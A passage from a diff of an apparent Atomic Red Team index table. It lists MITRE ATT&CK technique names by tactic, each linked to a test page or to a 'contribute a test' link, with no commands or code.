-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
-| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Rc.common](../../T1037.004/T1037.004.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
-| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
-| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Rc.common](../../T1037.004/T1037.004.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
-| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
-| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Startup Items](../../T1037.005/T1037.005.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
-| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
-| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
-| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
-| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
-| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
-| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Trap](../../T1546.005/T1546.005.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
-| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
-| | | [Windows Service](../../T1543.003/T1543.003.md) | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+| | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Unix Shell](../../T1059.004/T1059.004.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
